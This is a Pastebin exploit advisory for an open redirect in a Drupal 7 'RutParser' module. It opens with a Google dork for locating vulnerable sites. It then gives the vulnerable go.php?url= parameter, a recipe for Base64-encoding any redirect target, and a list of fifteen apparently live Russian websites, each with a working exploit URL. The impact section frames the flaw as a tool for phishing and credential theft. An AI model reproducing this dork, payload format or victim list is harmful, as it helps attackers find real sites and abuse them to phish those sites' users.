Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ##################################################################################
- # Exploit Title : Drupal 7 CMS RutParser Modules Open Redirection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 18/05/2019
- # Vendor Homepage : drupal.org
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : High
- # Google Dorks : inurl:/sites/all/modules/rutparser/ site:ru
- # Vulnerability Type : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ##################################################################################
- # Impact :
- ***********
- Drupal 7 CMS RutParser Modules accepts a user-controlled input that specifies a link to an external site, and uses
- that link in a Redirect. This simplifies phishing attacks. An http parameter may contain a URL value and could cause
- the web application to redirect the request to the specified URL. By modifying the URL value to a malicious site,
- an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the
- modified link is identical to the original site, phishing attempts have a more trustworthy appearance.
- Open redirect is a failure in that process that makes it possible for attackers to steer users to malicious websites.
- This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it. Web users often
- encounter redirection when they visit the Web site of a company whose name has been changed or which has been
- acquired by another company. Visiting unreal web page user's computer becomes affected by malware the task of
- which is to deceive the valid actor and steal his personal data.
- ##################################################################################
- # Vulnerable File :
- *****************
- /go.php
- # Vulnerable Parameter :
- ***********************
- ?url=
- # Open Redirection Exploit :
- **************************
- /sites/all/modules/rutparser/go.php?url=[BASE64 Encoded URL]
- /sites/all/modules/rutparser/go.php?url=aHR0cHM6Ly9jeHNlY3VyaXR5LmNvbS8=
- Note : Convert any random desired redirection address into the Base64 Encoded Link.
- Example 1 => aHR0cHM6Ly9jeHNlY3VyaXR5LmNvbS8= stands for cxsecurity.com
- Example 2 => aHR0cHM6Ly93d3cuY3liZXJpem0ub3JnLw== stands for cyberizm.org
- Example 3 => aHR0cDovL2V4cGxvaXQ0YXJhYi5vcmcv stands for exploit4arab.org
- Example 4 => aHR0cHM6Ly9wYWNrZXRzdG9ybXNlY3VyaXR5LmNvbS8= stands for packetstormsecurity.com
- Useable Base64 Encoder - Decoder Links :
- base64decode.org
- base64encode.org
- ##################################################################################
- # Example Vulnerable Sites :
- *************************
- [+] tvto.ru/sites/all/modules/rutparser/go.php?url=aHR0cHM6Ly9jeHNlY3VyaXR5LmNvbS8=
- [+] my-disain.ru/sites/all/modules/rutparser/go.php?url=aHR0cHM6Ly9jeHNlY3VyaXR5LmNvbS8=
- [+] nwtb.ru/sites/all/modules/rutparser/go.php?url=aHR0cHM6Ly9jeHNlY3VyaXR5LmNvbS8=
- [+] pups-market.ru/sites/all/modules/rutparser/go.php?url=aHR0cHM6Ly9jeHNlY3VyaXR5LmNvbS8=
- [+] vuz-chursin.ru/sites/all/modules/rutparser/go.php?url=aHR0cHM6Ly9jeHNlY3VyaXR5LmNvbS8=
- [+] freshmp3.ru/sites/all/modules/rutparser/go.php?url=aHR0cHM6Ly9jeHNlY3VyaXR5LmNvbS8=
- [+] midiman.ru/sites/all/modules/rutparser/go.php?url=aHR0cHM6Ly9jeHNlY3VyaXR5LmNvbS8=
- [+] cultandart.ru/sites/all/modules/rutparser/go.php?url=aHR0cHM6Ly9jeHNlY3VyaXR5LmNvbS8=
- [+] photopricer.ru/sites/all/modules/rutparser/go.php?url=aHR0cHM6Ly9jeHNlY3VyaXR5LmNvbS8=
- [+] kruizrock.ru/sites/all/modules/rutparser/go.php?url=aHR0cHM6Ly9jeHNlY3VyaXR5LmNvbS8=
- [+] ikraclub.ru/sites/all/modules/rutparser/go.php?url=aHR0cHM6Ly9jeHNlY3VyaXR5LmNvbS8=
- [+] people4people.ru/sites/all/modules/rutparser/go.php?url=aHR0cHM6Ly9jeHNlY3VyaXR5LmNvbS8=
- [+] bashtarif.ru/sites/all/modules/rutparser/go.php?url=aHR0cHM6Ly9jeHNlY3VyaXR5LmNvbS8=
- [+] colton.ru/sites/all/modules/rutparser/go.php?url=aHR0cHM6Ly9jeHNlY3VyaXR5LmNvbS8=
- [+] inbiom.ru/sites/all/modules/rutparser/go.php?url=aHR0cHM6Ly9jeHNlY3VyaXR5LmNvbS8=
- ##################################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ##################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement